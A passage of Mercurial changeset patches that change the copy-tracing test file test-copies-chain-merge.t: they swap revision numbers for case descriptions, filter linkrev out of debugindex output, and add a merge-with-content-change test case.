f, E side: b to f, (same content for f) - the other way + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | 
o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' @@ -1705,21 +1705,21 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b @@ -1758,32 +1758,32 @@ #if no-changeset $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` 
relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1799,21 +1799,21 @@ consider history and rename on both branch of the merge. $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way + o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". 
@@ -1840,28 +1840,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1869,28 +1869,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + o mDGm-0 actual content merge, copies on 
one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -1907,21 +1907,21 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h Note: @@ -1985,52 +1985,52 @@ #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way + o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 25 g-1: update d + o g-1: update d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o mGFm-0 
merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 25 g-1: update d + o g-1: update d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -2048,19 +2048,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h 'a' is the copy source of 'd' @@ -2093,19 +2093,19 @@ copy tracing chain. 
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h 'a' is the the copy source of 'd' @@ -2139,19 +2139,19 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | 
i-2: c -move-> d | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613770045 -3600 # Fri Feb 19 22:27:25 2021 +0100 # Node ID cb15216a52f5b86a144ea2f1c1966f119673b961 # Parent 74e2256a56b8a57f3aa556d0601b0e47dd41570d test-copies: use "case-id" instead of revision number when listing sidedata The revision numbers are not very informative and can change when new changesets are added, creating unnecessary churn. We change the template before adding more tests to improve the clarity of the other changesets. Differential Revision: https://phab.mercurial-scm.org/D10049 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1074,266 +1074,267 @@ added : h, ; $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do - > echo "##### revision $rev #####" + > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` + > echo "##### revision \"$case_id\" #####" > hg debugsidedata -c -v -- $rev > hg debugchangedfiles $rev > done - ##### revision 0 ##### + ##### revision "i-0 initial commit" ##### 1 sidedata entries entry-0014 size 34 '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' added : a, ; added : b, ; added : h, ; - ##### revision 1 ##### + ##### revision "i-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' removed : a, ; added p1: c, a; - ##### revision 2 ##### + ##### revision "i-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' removed : c, ; added p1: d, c; - ##### revision 3 ##### + #####
revision "a-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de' removed : d, ; added p1: e, d; - ##### revision 4 ##### + ##### revision "a-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef' removed : e, ; added p1: f, e; - ##### revision 5 ##### + ##### revision "b-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b' touched : b, ; - ##### revision 6 ##### + ##### revision "c-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 7 ##### + ##### revision "d-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 8 ##### + ##### revision "d-2 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 9 ##### + ##### revision "e-1 b -move-> g" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg' removed : b, ; added p1: g, b; - ##### revision 10 ##### + ##### revision "e-2 g -move-> f" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; - ##### revision 11 ##### + ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 12 ##### + ##### revision "mABm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 13 ##### + ##### revision "mBCm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 14 ##### + ##### revision "mBCm-1 re-add 
d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 15 ##### + ##### revision "mCBm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 16 ##### + ##### revision "mCBm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 17 ##### + ##### revision "mBDm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 18 ##### + ##### revision "mDBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 19 ##### + ##### revision "mAEm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 20 ##### + ##### revision "mEAm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 21 ##### + ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi' removed : h, ; added p1: i, h; - ##### revision 22 ##### + ##### revision "f-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di' touched p1: d, i; removed : i, ; - ##### revision 23 ##### + ##### revision "mBFm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 24 ##### + ##### revision "mFBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 25 ##### + ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' touched : d, ; - ##### 
revision 26 ##### + ##### revision "mDGm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 27 ##### + ##### revision "mGDm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 28 ##### + ##### revision "mFGm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 29 ##### + ##### revision "mGFm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 30 ##### + ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 31 ##### + ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 32 ##### + ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 33 ##### + ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 34 ##### + ##### revision "h-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd' removed : b, ; added p1: d, b; - ##### revision 35 ##### + ##### revision 
"mCH-delete-before-conflict-m-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 36 ##### + ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 37 ##### + ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' added : unrelated-j, ; - ##### revision 38 ##### + ##### revision "k-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' added : unrelated-k, ; - ##### revision 39 ##### + ##### revision "mAE,Km" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 40 ##### + ##### revision "mK,AEm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 41 ##### + ##### revision "mEA,Jm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 42 ##### + ##### revision "mJ,EAm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 43 ##### + ##### revision "l-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' added : unrelated-l, ; - ##### revision 44 ##### + ##### revision "mBC+revert,Lm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 45 ##### + ##### revision "mCB+revert,Lm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 46 ##### + ##### revision "mL,BC+revertm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 47 ##### + ##### revision "mL,CB+revertm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 48 ##### + ##### revision "n-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' added : unrelated-n, ; - ##### revision 49 ##### + ##### revision "o-1" ##### 
1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' added : unrelated-o, ; - ##### revision 50 ##### + ##### revision "mFG,Om" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 51 ##### + ##### revision "mO,FGm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 52 ##### + ##### revision "mGF,Nm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 53 ##### + ##### revision "mN,GFm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613771806 -3600 # Fri Feb 19 22:56:46 2021 +0100 # Node ID 9cd4f58467af8cf237979946ab4da058033b5aa6 # Parent cb15216a52f5b86a144ea2f1c1966f119673b961 test-copies: filter out the linkrev part of `debugindex` It is not really useful for the tests and is a large source of churn when adding more revisions to the tests. Differential Revision: https://phab.mercurial-scm.org/D10050 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -14,6 +14,19 @@ use git diff to see rename + $ cat << EOF >> ./no-linkrev + > #!$PYTHON + > # filter out linkrev part of the debugindex command + > import sys + > for line in sys.stdin: + > if " linkrev " in line: + > print(line.rstrip()) + > else: + > l = "%s *%s" % (line[:6], line[14:].rstrip()) + > print(l) + > EOF + $ chmod +x no-linkrev + $ cat << EOF >> $HGRCPATH > [diff] > git=yes @@ -372,12 +385,12 @@ created new head $ hg mv --force i d $ hg commit -m "f-2: rename i -> d" - $ hg debugindex d + $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) - 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) 
- 1 8 b004912a8510 000000000000 000000000000 - 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -1543,13 +1556,13 @@ $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) - $ hg debugindex d | head -n 4 + $ hg debugindex d | head -n 4 | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) - 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) - 1 8 b004912a8510 000000000000 000000000000 - 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) - 2 25 5cce88bf349f ae258f702dfe 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !) 
Log output should not include a merge commit as it did not happen @@ -1610,11 +1623,11 @@ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' e8825b386367b29fec957283a80bb47b47483fe1 644 f - $ hg debugindex f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 b76eb76580df 000000000000 000000000000 - 1 10 e8825b386367 000000000000 000000000000 - 2 19 2ff93c643948 b76eb76580df e8825b386367 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f @@ -1624,9 +1637,9 @@ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f - $ hg debugindex f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 ae258f702dfe 000000000000 000000000000 + 0 * ae258f702dfe 000000000000 000000000000 #endif # Here the filelog based implementation is not looking at the rename # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614019173 -3600 # Mon Feb 22 19:39:33 2021 +0100 # Node ID 3aef76c3fd3822d134d12eb5c8fb2eb2c77738bc # Parent 9cd4f58467af8cf237979946ab4da058033b5aa6 test-copies: add a "change during merge" variant to the A+E test Checks inline comment for details. diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -687,6 +687,60 @@ o i-0 initial commit: a b h +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +Multiple cases above explicitely test cases where content are the same on both side during merge. 
In this section we will introduce variants for theses cases where new change are introduced to these file content during the merges. + + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +Same as `mAEm` and `mEAm` but with extra change to the file before commiting + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) + + $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)" + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mAE-change-m" > f + $ hg ci -m "mAE-change-m-0 $case_desc - one way" + created new head + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
+ (branch merge, don't forget to commit) + $ echo "content change for mEA-change-m" > f + $ hg ci -m "mEA-change-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -703,7 +757,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1001,6 +1055,7 @@ l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1018,6 +1073,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with 
